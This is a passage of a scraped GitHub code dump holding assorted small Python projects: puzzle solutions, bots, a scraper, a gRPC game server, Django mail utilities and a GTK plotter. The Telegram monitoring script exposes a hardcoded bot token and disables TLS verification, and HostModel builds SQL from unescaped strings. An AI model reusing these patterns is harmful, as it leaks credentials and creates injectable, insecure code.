return_key))\n if i == 0:\n # first, set match == to set\n match = temp_match\n else:\n logic = self.logic[i - 1]\n if logic == 'AND':\n match = match & temp_match\n 
else:\n match = match | temp_match\n return list(match)\n","repo_name":"Varadharajan88/PyCapNoSSL","sub_path":"redcap/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"23934274197","text":"def swap(mix, curr_pos, mix_pos):\n if curr_pos == mix_pos:\n return mix\n elif curr_pos < mix_pos:\n before_item = mix[:curr_pos]\n after_item = mix[curr_pos+1:]\n before_move = after_item[:mix_pos-curr_pos]\n after_move = after_item[mix_pos-curr_pos:]\n return before_item + before_move + [mix[curr_pos]] + after_move\n else:\n before_item = mix[:curr_pos]\n after_item = mix[curr_pos+1:]\n before_move = before_item[:mix_pos]\n after_move = before_item[mix_pos:]\n return before_move + [mix[curr_pos]] + after_move + after_item\n\nif __name__ == '__main__':\n with open('input', 'r') as f:\n content = f.read()\n\n num = [int(n) for n in content.split('\\n') if n.strip() != \"\"]\n res = [n * 811589153 for n in num]\n idx = list(range(len(num)))\n for _ in range(10):\n for i in range(len(idx)):\n curr_pos = idx.index(i)\n n = res[curr_pos]\n if n == 0:\n mix_pos = curr_pos\n else:\n mix_pos = (curr_pos + n) % (len(res) - 1)\n if mix_pos == 0:\n mix_pos = len(res) - 1\n idx = swap(idx, curr_pos, mix_pos)\n res = swap(res, curr_pos, mix_pos)\n\n i = res.index(0)\n coord = [\n res[(i + 1000) % len(res)],\n res[(i + 2000) % len(res)],\n res[(i + 3000) % len(res)]\n ]\n print(sum(coord))\n","repo_name":"coderlew/advent-of-code","sub_path":"2022/20/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70126778486","text":"def stemString(input_string):\n from nltk.stem.snowball import SnowballStemmer\n stemmer = SnowballStemmer(\"english\")\n\n tokens = input_string.split()\n singles = [stemmer.stem(token) for token in tokens]\n stemmed_string = ' '.join(singles)\n\n return stemmed_string\n\ntest_string = \"Still looking for Pokemon all over the street. 
When is Niantic fixing that stupid three step bug?\"\nprint(stemString(test_string))","repo_name":"askldjd/udacity-machine-learning","sub_path":"proj/ud120-projects/tools/stemmer-test.py","file_name":"stemmer-test.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"16270009664","text":"import color_contrast_calc as calc\n\nyellow = calc.color_from('yellow')\norange = calc.color_from('orange')\n\n\nreport = 'The grayscale of {:s} ({:s}) is {:s}'\n\nprint(report.format(yellow.hex, yellow.name,\n yellow.with_grayscale().hex))\nprint(report.format(orange.hex, orange.name,\n orange.with_grayscale().hex))\n","repo_name":"nico-hn/color_contrast_calc_py","sub_path":"examples/grayscale.py","file_name":"grayscale.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"41835866570","text":"import asyncio\nimport re\nimport typing as T\n\nfrom graia.application import GraiaMiraiApplication, Group, Friend, MessageChain\nfrom loguru import logger\n\nfrom pixiv import make_illust_message, papi, PixivResultError\nfrom utils import launch\nfrom .abstract_message_handler import AbstractMessageHandler\n\n\nclass PixivIllustQueryHandler(AbstractMessageHandler):\n\n async def handle(self, app: GraiaMiraiApplication,\n subject: T.Union[Group, Friend],\n message: MessageChain,\n channel: asyncio.Queue) -> bool:\n # 检测是否触发\n accept = False\n content = message.asDisplay()\n for x in self.trigger:\n if x in content:\n accept = True\n break\n\n if not accept:\n return False\n\n # 提取消息中的所有id\n regex = re.compile(\"[1-9][0-9]*\")\n ids = [int(x) for x in regex.findall(content)]\n logger.info(f\"{self.tag}: {ids}\")\n\n # 每个id建立一个task,以获取插画并扔到channel中\n async def make_msg(illust_id):\n try:\n result = await launch(papi.illust_detail, illust_id=illust_id)\n if \"error\" in result:\n raise PixivResultError(result[\"error\"])\n else:\n msg = await make_illust_message(result[\"illust\"])\n logger.info(f\"\"\"{self.tag}: [{result[\"illust\"][\"id\"]}] ok\"\"\")\n except Exception as exc:\n msg = self.handle_and_make_error_message(exc)\n\n await channel.put(msg)\n\n tasks = []\n for x in ids:\n tasks.append(asyncio.create_task(make_msg(x)))\n\n await asyncio.wait(tasks, return_when=asyncio.ALL_COMPLETED)\n return True\n","repo_name":"dk13333972721/PixivBot","sub_path":"handler/pixiv_illust_query_handler.py","file_name":"pixiv_illust_query_handler.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"26979227769","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport lxml\n\n\nURL = 'https://www.wildberries.ru/catalog/sport/vidy-sporta/fitnes/yoga'\n\nHEADERS = {'accept':'*/*','user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'}\n\nsession = requests.Session()\n\nrequest = session.get(URL,headers=HEADERS)\ni = 0\nif request.status_code == 200:\n soup = bs(request.content,'xml')\n list_tag_a = soup.find_all('a',{'class':'ref_goods_n_p j-open-full-product-card'})\n for a in list_tag_a:\n print(a['href'])\n # category = a.find('span',{'class':'goods-name c-text-sm'})\n # product = a.find('strong',{'class':'brand-name c-text-sm'})\n # image = a.find_all('img',{'class':'thumbnail'})[1]['src']\n # raiting = 
a.find('span',{'itemprop':'aggregateRating'})\n # # number_of_sales_transfer = 0\n # price_no_discont = str(a.find('span',{'class':'price-old-block'})).split('del')\n # if len(price_no_discont)>2:\n # print(price_no_discont[1].replace('>','').split('<')[0])\n # price_discont = a.find('ins',{'class':'lower-price'})\n # quantity_reviews = a.find('span',{'class':'dtList-comments-count c-text-sm'})\n # print(category.text)\n # print(product.text)\n # print(image)\n # print(raiting)\n # if len(price_no_discont)>2:\n # price_no_discont = price_no_discont[1].replace('>','').split('<')[0]\n # print(price_no_discont)\n # print(price_discont)\n # print(quantity_reviews)\n # i += 1\n # print(i)\n","repo_name":"maxim3722/wildberriesscraping","sub_path":"test_page_parser_wildberries.py","file_name":"test_page_parser_wildberries.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4498776719","text":"import datetime\nimport requests, pyodbc, os\nimport logging\nos.environ[\"NLS_LANG\"] = \".UTF8\"\npyodbc.pooling = False\n\nclass Monitoring():\n\n def __init__(self):\n logging.basicConfig(filename='myapp.log', level=logging.INFO)\n\n def send_alert(self, text):\n \"\"\" Метод для отправки уведомлений на телегу\n данные собирает из вьюшки [dbo].[vFaultedJobsToday2]\n со статусом Faulted, то что обработал, записывает в таблицу [dbo].[faulted_id2] \"\"\"\n\n process = \"update WB\"\n server = \"PC KEML\"\n info = text\n createtime = datetime.datetime.now()\n head = \"---------------------------------------------------------------------------\\n\"\n row1 = \" {} \\n\".format(\"🔥🔥🔥 \" + process)\n row2 = \" {} \\n\".format(\"🖥️ \" + server)\n row3 = \" {} \\n\".format(\"💡 \" + info.replace(\"\\n\", \"\"))\n row4 = \" {} \\n\".format(\"⌚ \" + str(createtime))\n footer = \"---------------------------------------------------------------------------\\n\"\n\n msg = row1 + row2 + row3 + row4\n self.send_message_bot(msg)\n logging.info('row with id ' + str(id) + \"processed\")\n\n\n def send_message_bot(self, text):\n endPoint = \"https://api.telegram.org/bot\"\n # id = \"-579581470\"\n id = \"-914261239\" # supergroup id\n Token = \"5681293588:AAEWMxiSSAdVkc0HRW1yTEAzDqOGVKzokWk/\"\n r = requests.get(url=endPoint+Token+\"sendMessage?chat_id=\"+id+\"&text=\"+text+\"&parse_mode=html\", verify=False)\n\n resp = r.json()\n if resp[\"ok\"]:\n return 'successfull'\n else:\n raise RuntimeError(r.content)\n\n\ncls = Monitoring()\ncls.send_alert(\"I have some updates for you\")\n\n\n\n\n","repo_name":"darkmanjscz/Keml","sub_path":"monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34456879078","text":"import logging\nimport time\nfrom concurrent import futures\nfrom google.protobuf import message\nimport pika\nimport grpc\nimport json\nimport app.gameimpl.spelling_bee as spelling_bee\nfrom spelling_bee_game_pb2 import GameResponse, FinalizeResponse, SuggestionResponse, Word, RegisterResponse, StatusResponse\nfrom spelling_bee_game_pb2_grpc import SpellingBeeGameServicer, add_SpellingBeeGameServicer_to_server\nfrom game_registry import GameRegistry\nfrom domain import spelling_bee_game, suggestion\nfrom pattern import object_factory\nfrom datatype.enums import GameStatus\n\nclass SpellingBeeServer(SpellingBeeGameServicer):\n\n def __init__(self):\n self.game_type = \"Spelling Bee 
Multi player\"\n self.factory = object_factory.ObjectFactory()\n self.factory.register_builder(\n \"Spelling Bee Multi player\", spelling_bee.SpellingBeeGameBuilder())\n self.registry = GameRegistry.get_instance()\n\n def CreateGame(self, request, context):\n print(\"in create game\")\n new_game = self.factory.create(request.gameType)\n game = spelling_bee_game.SpellingBeeGame()\n game.register_player(request.userName)\n new_game.set_game(game)\n game_id = self.registry.add_game(new_game)\n print(\"Created game: \" + game_id)\n return GameResponse(gameId=game_id)\n \n def RegisterPlayer(self, request, context):\n print(\"in register player\")\n game = self.registry.get_game(request.gameId)\n playerIndex = -1 if game == -1 else game.game.register_player(request.userName)\n if playerIndex == -1: print(\"Incorrect game id by user.\")\n return RegisterResponse(playerIndex=playerIndex)\n \n def GameStatus(self, request, context):\n # print(\"in game status\") # commented out to avoid spam in server\n game = self.registry.get_game(request.gameId)\n myPangram = game.retrieve_pangram() if game.retrieve_pangram() else \"\"\n status = True if game.game.status == GameStatus.IN_PROGRESS else False\n playerCount = len(game.game.players);\n return StatusResponse(playerCount=playerCount, pangram=myPangram, status=status)\n \n def FinalizeGame(self, request, context):\n print(\"in finalize\")\n game = self.registry.get_game(request.gameId)\n game.finalize_setup()\n return FinalizeResponse()\n \n def ProcessSuggestion(self, request, context):\n print(\"In 'visit' for: \" + str(request.gameId))\n my_suggestion = suggestion.Suggestion(request.suggestion)\n game = self.registry.get_game(request.gameId)\n \n result, response = game.process_suggestion(\n request.playerIndex, my_suggestion)\n \n message = \"\"\n for n in range(0, len(game.game.players)):\n message += f\"\\n{game.game.players[n]} stats:\\n\"\\\n f\"- Words = {game.game.words[n].keys()}\\n\"\\\n f\"- Score = {game.game.scores[n]}\\n\" \n \n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n channel = connection.channel()\n channel.queue_declare(queue='player-stats')\n channel.basic_publish(exchange='',routing_key='player-stats',body=json.dumps(message))\n connection.close()\n \n return SuggestionResponse(result=result, message=response)\n \ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n add_SpellingBeeGameServicer_to_server(SpellingBeeServer(), server)\n server.add_insecure_port('[::]:50055')\n server.start()\n print(\"Server running!\\nWaiting for client...\")\n server.wait_for_termination()\n\n\nif __name__ == '__main__':\n logging.basicConfig()\n serve()\n","repo_name":"RomainClem/SpellingBeeDistSys","sub_path":"app/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25854086992","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom AppInit import db, sqlSession\nfrom flask_login import UserMixin\n\n\nclass HostModel(db.Model, UserMixin):\n __tablename__ = 'ops_host_detail'\n\n id = db.Column(db.Integer, autoincrement=True, primary_key=True)\n host_id = db.Column(db.String(255), primary_key=True)\n host_name = db.Column(db.String(255))\n host_ip = db.Column(db.String(255))\n host_total_disk = db.Column(db.String(255))\n host_used_disk = db.Column(db.String(255))\n host_avai_disk = db.Column(db.String(255))\n host_total_memory = 
db.Column(db.Integer)\n host_free_memory = db.Column(db.Integer)\n host_avai_memory = db.Column(db.Integer)\n host_model_cpu = db.Column(db.String(255))\n host_physical_cpu = db.Column(db.String(255))\n host_logic_cpu = db.Column(db.String(255))\n host_os_time = db.Column(db.String(255))\n host_os_version = db.Column(db.String(255))\n host_computing_time = db.Column(db.String(255))\n update_time = db.Column(db.String(255))\n\n def __init__(self, id, host_id, host_name, host_ip, host_total_disk,\n host_used_disk, host_avai_disk, host_total_memory, host_free_memory, host_avai_memory,\n host_model_cpu, host_physical_cpu, host_logic_cpu, host_os_time, host_computing_time, host_os_version,update_time):\n self.id = id\n self.host_id = host_id\n self.host_name = host_name\n self.host_ip = host_ip\n self.host_total_disk = host_total_disk\n self.host_used_disk = host_used_disk\n self.host_avai_disk = host_avai_disk\n self.host_total_memory = host_total_memory\n self.host_free_memory = host_free_memory\n self.host_avai_memory = host_avai_memory\n self.host_model_cpu = host_model_cpu\n self.host_physical_cpu = host_physical_cpu\n self.host_logic_cpu = host_logic_cpu\n self.host_os_time = host_os_time\n self.host_computing_time = host_computing_time\n self.host_os_version = host_os_version\n self.update_time = update_time\n\n @staticmethod\n def query_by_hostsID(host_id):\n return HostModel.query.filter(HostModel.host_id == host_id).first()\n\n @staticmethod\n def all():\n return HostModel.query.all()\n\n @staticmethod\n def with_entities(*entities):\n return HostModel.query.with_entities(*entities)\n\n def __repr__(self):\n return '' % self.id\n\n def exeSql(sql, echo):\n if echo:\n print(sql)\n return sqlSession.execeQuery(sql)\n\n def getHostInfo(echo=False):\n sql = '''SELECT host_id,\n host_ip,\n host_name,\n host_total_memory,\n host_total_disk,\n host_logic_cpu,\n host_computing_time,\n host_os_version FROM {} order by host_id;'''.format(HostModel.__tablename__)\n return HostModel.exeSql(sql, echo)\n\n def updateHostsDetail(keys, values, echo=False):\n sql = \"REPLACE INTO {} ({})VALUES({})\".format(HostModel.__tablename__,\n str(keys).replace(\"'\", \"\").replace('[', '').replace(']', ''),\n str(values).replace('[', '').replace(']', ''))\n HostModel.exeSql(sql, echo)\n","repo_name":"jiuhonglaugh/rocket","sub_path":"control/model/HostModel.py","file_name":"HostModel.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70754534327","text":"\"\"\"\nCreates DataRobot projects and deployments for specified dataset and use case.\n\nInformation about the projects and deployments are stored in a reference file.\n\"\"\"\n\nimport datarobot as dr\nimport pandas as pd\nimport drutils as du\n\n# setup\ncf = du.load_config('../usecase_config.yaml')\ndr.Client(config_path='../drconfig.yaml')\n\ndf = pd.read_csv(cf['dataset'])\n# optional filtering to reduce deployments\ndf = df[df[cf['series']].isin(cf['filter'])]\n\n################################################################################\n# project setup\nspec = du.setup_basic_time_spec(cf)\n\n# check existing deployments\ndeployments = dr.Deployment.list()\ndeployment_names = [d.label for d in deployments]\n\n# pull out server information for deployment\nprediction_server = dr.PredictionServer.list()[0]\n\nreference = pd.DataFrame()\n\n# iterate through series\nfor s in df[cf['series']].unique():\n proj_name = 'auto retrain ' + s + ' ' + 
df[cf['timecol']].max()\n subdf = df[df[cf['series']] == s]\n print('creating deployment for ' + s)\n # get or create project\n project = du.get_existing_project(proj_name)\n if project is None:\n # upload data and create project\n project = dr.Project.create(subdf, project_name=proj_name)\n # finalise project, and run autopilot with max workers\n project.set_target(cf['target'],\n partitioning_method=spec,\n metric=cf['metric'],\n worker_count=-1)\n project.wait_for_autopilot()\n # take best model and deploy\n model = dr.ModelRecommendation.get(project.id).get_model()\n if proj_name in deployment_names:\n deployment = deployments[deployment_names.index(proj_name)]\n else:\n deployment = dr.Deployment.create_from_learning_model(\n model.id,\n label=proj_name,\n description=cf['description'],\n default_prediction_server_id=prediction_server.id)\n # ensure deployment settings are turned on\n deployment.update_drift_tracking_settings(target_drift_enabled=True,\n feature_drift_enabled=True,\n max_wait=60)\n deployment.update_association_id_settings(\n column_names=['id'], required_in_prediction_requests=True, max_wait=60)\n # get metric for parent of frozen model\n parent = du.get_parent_model(model)\n # store information for later use\n reference = reference.append(\n pd.DataFrame([{\n 'use_case': s,\n 'latest_project': project.id,\n 'deployment_id': deployment.id,\n 'error': parent.metrics[cf['metric']]['crossValidation']\n }]))\n\nreference.to_csv(cf['ref_file'], index=False)\n","repo_name":"datarobot-community/tutorials-for-data-scientists","sub_path":"Model Management/Automated Retraining and Replacement/py/create_initial_deployments.py","file_name":"create_initial_deployments.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"76"} +{"seq_id":"28838066329","text":"import heapq\n\ndef solution(book_time):\n answer = 0\n \n # 분으로 변환\n book_min = []\n for start, end in book_time:\n start_h, start_m = map(int, start.split(\":\"))\n end_h, end_m = map(int, end.split(\":\"))\n book_min.append([start_h * 60 + start_m, end_h * 60 + end_m + 10])\n \n pq = []\n book_min.sort(key=lambda x: x[0])\n for start, end in book_min:\n while pq:\n if pq[0] <= start:\n heapq.heappop(pq)\n else:\n break\n \n heapq.heappush(pq, end)\n answer = max(answer, len(pq))\n \n return answer","repo_name":"gnlenfn/DailyProblemSolving","sub_path":"프로그래머스/unrated/155651. 
호텔 대실/호텔 대실.py","file_name":"호텔 대실.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11213041001","text":"from setuptools import setup\n\nDEPENDENCIES = open('requirements.txt', 'r').read().split('\\n')\nREADME = open('README.md', 'r').read()\n\nsetup(\n name='neochecker',\n version='1.0.0',\n description='Python library and CLI for checking Neo addresses',\n long_description=README,\n long_description_content_type='text/markdown',\n author='HexOffender',\n author_email='HexOffender_1337@protonmail.com',\n url=\"http://github.com/\",\n packages=['neochecker'],\n entry_points={\n 'console_scripts': ['neochecker = neochecker.neochecker:main']\n },\n install_requres=DEPENDENCIES,\n keywords=['security', 'network', 'cryptocurrency'],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ]\n)\n","repo_name":"BraveLittleRoaster/neochecker","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6647841926","text":"import warnings\n\nfrom django.conf import settings\nfrom django.core.files import File\nfrom django.core.mail import get_connection\nfrom django.db.models import Q\n\ntry:\n from django.utils.encoding import force_text\nexcept ImportError:\n from django.utils.encoding import force_unicode as force_text\n\nfrom post_office import cache\nfrom .compat import string_types\nfrom .models import Email, PRIORITY, STATUS, EmailTemplate, Attachment\nfrom .settings import get_email_backend\n\ntry:\n from django.utils import timezone\n now = timezone.now\nexcept ImportError:\n import datetime\n now = datetime.datetime.now\n\n\ndef send_mail(subject, message, from_email, recipient_list, html_message='',\n scheduled_time=None, headers=None, priority=PRIORITY.medium):\n \"\"\"\n Add a new message to the mail queue. 
This is a replacement for Django's\n ``send_mail`` core email method.\n \"\"\"\n\n subject = force_text(subject)\n status = None if priority == PRIORITY.now else STATUS.queued\n emails = []\n for address in recipient_list:\n emails.append(\n Email.objects.create(\n from_email=from_email, to=address, subject=subject,\n message=message, html_message=html_message, status=status,\n headers=headers, priority=priority, scheduled_time=scheduled_time\n )\n )\n if priority == PRIORITY.now:\n for email in emails:\n email.dispatch()\n return emails\n\n\ndef send_queued_mail():\n \"\"\"\n Sends out all queued mails that has scheduled_time less than now or None\n \"\"\"\n sent_count = 0\n failed_count = 0\n queued_emails = Email.objects.filter(status=STATUS.queued) \\\n .filter(Q(scheduled_time__lte=now()) | Q(scheduled_time=None)) \\\n .order_by('-priority')\n\n if queued_emails:\n\n # Try to open a connection, if we can't just pass in None as connection\n try:\n connection = get_connection(get_email_backend())\n connection.open()\n except Exception:\n connection = None\n\n for mail in queued_emails:\n status = mail.dispatch(connection)\n if status == STATUS.sent:\n sent_count += 1\n else:\n failed_count += 1\n if connection:\n connection.close()\n print('%s emails attempted, %s sent, %s failed' % (\n len(queued_emails), sent_count, failed_count)\n )\n\n\ndef send_templated_mail(template_name, from_address, to_addresses,\n context={}, priority=PRIORITY.medium):\n warnings.warn(\n \"The `send_templated_mail` command is deprecated and will be removed \"\n \"in a future relase. Please use `post_office.mail.send` instead.\",\n DeprecationWarning)\n email_template = get_email_template(template_name)\n for address in to_addresses:\n email = Email.objects.from_template(from_address, address, email_template,\n context, priority)\n if priority == PRIORITY.now:\n email.dispatch()\n\n\ndef get_email_template(name):\n \"\"\"\n Function to get email template object that checks from cache first if caching is enabled\n \"\"\"\n if hasattr(settings, 'POST_OFFICE_CACHE') and settings.POST_OFFICE_TEMPLATE_CACHE is False:\n return EmailTemplate.objects.get(name=name)\n else:\n email_template = cache.get(name)\n if email_template is not None:\n return email_template\n else:\n email_template = EmailTemplate.objects.get(name=name)\n cache.set(name, email_template)\n return email_template\n\n\ndef split_emails(emails, split_count=1):\n # Group emails into X sublists\n # taken from http://www.garyrobinson.net/2008/04/splitting-a-pyt.html\n # Strange bug, only return 100 email if we do not evaluate the list\n if list(emails):\n return [emails[i::split_count] for i in range(split_count)]\n\n\ndef create_attachments(attachment_files):\n \"\"\"\n Create Attachment instances from files\n\n attachment_files is a dict of:\n * Key - the filename to be used for the attachment.\n * Value - file-like object, or a filename to open.\n\n Returns a list of Attachment objects\n \"\"\"\n attachments = []\n for filename, content in attachment_files.items():\n opened_file = None\n\n if isinstance(content, string_types):\n # `content` is a filename - try to open the file\n opened_file = open(content, 'rb')\n content = File(opened_file)\n\n attachment = Attachment()\n attachment.file.save(filename, content=content, save=True)\n\n attachments.append(attachment)\n\n if opened_file is not None:\n opened_file.close()\n\n return 
attachments\n","repo_name":"digideskio/django-post_office","sub_path":"post_office/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"787297642","text":"from gi import require_version\nrequire_version( 'Gtk', '3.0' )\nfrom gi.repository import Gtk\n\nimport copy\nimport os\n\nfrom matplotlib.figure import Figure\nfrom sympy import *\nfrom sympy.plotting import plot\nfrom ..proc.zoom import *\nfrom ..proc.eparser import *\nfrom ..proc.least import *\nfrom ..proc.pdfactory import *\n\nfrom numpy import *\nfrom matplotlib.backends.backend_gtk3cairo import FigureCanvasGTK3Cairo as FigureCanvas\n\nWIDTH = 10\nCOLOR = ['b','g','c', 'm', 'k']\nSTYLE = ['','-', '+', '', '--', '-.']\n\nclass GraphGrid(Gtk.Grid):\n\n def __init__(self, parent):\n Gtk.Grid.__init__(self)\n self.parent = parent\n\n self.fig = Figure( figsize=(6,6), dpi=65 )\n self.axis = self.fig.add_subplot( 111 )\n self.axis.grid( True )\n self.graph_count = 0\n\n self.set_border_width( WIDTH )\n self.set_column_homogeneous( 1 )\n self.set_row_spacing( WIDTH )\n self.set_column_spacing( WIDTH )\n\n #--ButtonGrid\n self.button_grid = Gtk.Grid()\n self.button_grid.set_border_width( WIDTH )\n self.button_grid.set_column_homogeneous( 1 )\n self.button_grid.set_row_spacing( WIDTH )\n self.button_grid.set_column_spacing( WIDTH )\n\n #--InputGrid\n self.txt_grid = Gtk.Grid()\n self.txt_grid.set_column_homogeneous( 1 )\n self.txt_grid.set_column_spacing( WIDTH )\n\n\n #--Buttons\n self.button_clear = Gtk.Button( 'Clear' )\n self.button_clear.connect( 'pressed', self.on_clear_press )\n self.button_add = Gtk.Button( 'Add' )\n self.button_add.connect( 'pressed', self.on_add_press )\n self.button_save = Gtk.Button( 'Save' )\n self.button_save.connect( 'pressed', self.on_save_press )\n self.button_snapshot = Gtk.Button( 'Snapshot' )\n self.button_snapshot.connect( 'pressed', self.on_snapshot_press )\n\n #--Text Input\n self.txt_eq = Gtk.Entry()\n self.txt_eq.set_placeholder_text('cos(var)...etc')\n self.lbl_eq = Gtk.Label( 'Equation:' )\n self.lbl_eq.set_justify( Gtk.Justification.LEFT )\n self.txt_var = Gtk.Entry()\n self.txt_var.set_placeholder_text('xc or x or y')\n self.lbl_var = Gtk.Label( 'Variables:' )\n self.lbl_var.set_justify( Gtk.Justification.LEFT )\n self.txt_ran = Gtk.Entry()\n self.txt_ran.set_placeholder_text('a,b')\n self.lbl_ran = Gtk.Label( 'Range:' )\n self.lbl_ran.set_justify( Gtk.Justification.LEFT )\n self.lbl_snapshot = Gtk.Label( 'Snapshot Taken' )\n self.lbl_snapshot.set_no_show_all( True )\n\n\n #--Graph added to canvas\n self.canvas = FigureCanvas( self.fig )\n self.canvas.set_size_request( 300, 300 )\n self.canvas.set_hexpand( True )\n self.canvas.set_vexpand( True )\n\n #--Button attachments\n self.button_grid.attach( self.txt_grid, 1,1,2,1 )\n self.button_grid.attach( self.button_add, 1,2,1,1 )\n self.button_grid.attach( self.button_clear, 2,2,1,1 )\n self.button_grid.attach( self.button_snapshot, 1,3,1,1 )\n self.button_grid.attach( self.button_save, 2,3,1,1 )\n self.button_grid.attach( self.lbl_snapshot, 1,4,2,1 )\n\n #--Entry attachments\n self.txt_grid.attach( self.lbl_var, 1,1,1,1 )\n self.txt_grid.attach( self.txt_var, 1,2,1,1 )\n self.txt_grid.attach( self.lbl_eq, 2,1,1,1 )\n self.txt_grid.attach( self.txt_eq, 2,2,1,1 )\n self.txt_grid.attach( self.lbl_ran, 3,1,1,1 )\n self.txt_grid.attach( self.txt_ran, 3,2,1,1 )\n\n #--Main Grid attachments\n self.attach( self.canvas, 1, 1, 1, 1 )\n 
self.attach( self.button_grid, 1, 2, 1, 1 )\n\n def render_main_eq( self, eq, vr, ran ):\n seq = sympify( eq )\n evaleq = lambdify(sympify( vr ), seq, modules=['numpy'])\n eq = str(eq).replace( '**', '^' )\n ran = linspace( ran[0], ran[1], 200)\n self.axis.set_title( 'fig.' + str(self.parent.cmodule.document.proc_count) )\n zp = ZoomPan()\n figZoom = zp.zoom_factory( self.axis, base_scale=1.05 )\n figPan = zp.pan_factory( self.axis )\n\n if self.graph_count > 0:\n #chooses random style for graph line\n line = COLOR[random.randint(0, len(COLOR) - 1)] + STYLE[random.randint(0, len(STYLE) - 1)]\n self.axis.set_ylim( top=10 )\n self.axis.plot( ran, evaleq(ran), line, label=eq )\n print( str(seq) )\n self.axis.legend( loc='best' )\n self.axis.margins( 0.4 )\n else:\n #first one is always red\n self.axis.plot( ran, evaleq(ran), 'r', label=eq )\n self.axis.legend( loc='best' )\n self.axis.margins( 0.4 )\n\n #makes the plot inmediatly render\n self.axis.figure.canvas.draw()\n self.graph_count += 1\n\n def save_render( self, filename ):\n self.fig.savefig(filename)\n\n def on_snapshot_press( self, button ):\n if self.parent.cmodule.document.proc_count > 0:\n self.save_render( 'ans' + str(self.parent.cmodule.document.proc_count - 1) + '.png' )\n else:\n self.save_render( 'ans' + str(self.parent.cmodule.document.proc_count) + '.png' )\n self.lbl_snapshot.show()\n\n def render_points( self, ptsx, ptsy, ran, lbl='Points given' ):\n if self.graph_count < 2:\n try:\n self.axis.plot( ptsx, ptsy, COLOR[random.randint(0, len(COLOR) - 1)] + 'o', label=lbl)\n self.axis.legend( loc='best' )\n self.axis.margins( 0.4 )\n except Exception:\n self.parent.raise_err_dialog( \"Invalid points to interpolate\" )\n\n def on_clear_press( self, button, opt=True ):\n self.axis.cla()\n self.axis.grid( True )\n self.graph_count = 0\n if opt:\n dialog = Gtk.MessageDialog(self.parent, 0, Gtk.MessageType.QUESTION,\n Gtk.ButtonsType.YES_NO, \"Warning!\")\n dialog.format_secondary_text(\n \"Do you wish to delete the Document in progress too?\")\n response = dialog.run()\n\n if response == Gtk.ResponseType.YES:\n self.parent.cmodule.document.proc_count = 0\n self.parent.cmodule.document.story = []\n self.lbl_snapshot.hide()\n dialog.destroy()\n\n def on_add_press( self, button ):\n try:\n ran = list_parser( self.txt_ran.get_text() )\n if len(ran) == 2:\n try:\n ran = [float(x) for x in ran]\n except TypeError:\n self.parent.raise_err_dialog( 'Invalid range for plotting' )\n return\n else:\n self.parent.raise_err_dialog( 'Invalid range for plotting' )\n return\n ran.sort()\n eq = list_parser( self.txt_eq.get_text() )\n if not ran:\n self.parent.raise_err_dialog( 'Invalid Range' );\n return\n elif not eq:\n self.parent.raise_err_dialog( 'Invalid Equation' )\n return\n elif len(self.txt_var.get_text()) > 2:\n self.parent.raise_err_dialog( 'Invalid Variable' )\n return\n else:\n self.render_main_eq( eq[0], self.txt_var.get_text(), ran )\n except Exception as e:\n self.parent.raise_err_dialog( 'Something went wrong: ' + str(e) )\n self.lbl_snapshot.hide()\n\n def on_save_press( self, button ):\n if self.parent.cmodule.document.story:\n sdialog = Gtk.FileChooserDialog( 'Saving', self.parent,\n Gtk.FileChooserAction.SAVE,\n (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OK, Gtk.ResponseType.OK))\n sdialog.set_current_name( \"procedure.pdf\" )\n response = sdialog.run()\n #--Checking if file exists and overwriting\n if response == Gtk.ResponseType.OK:\n if not os.path.exists( sdialog.get_filename() ):\n 
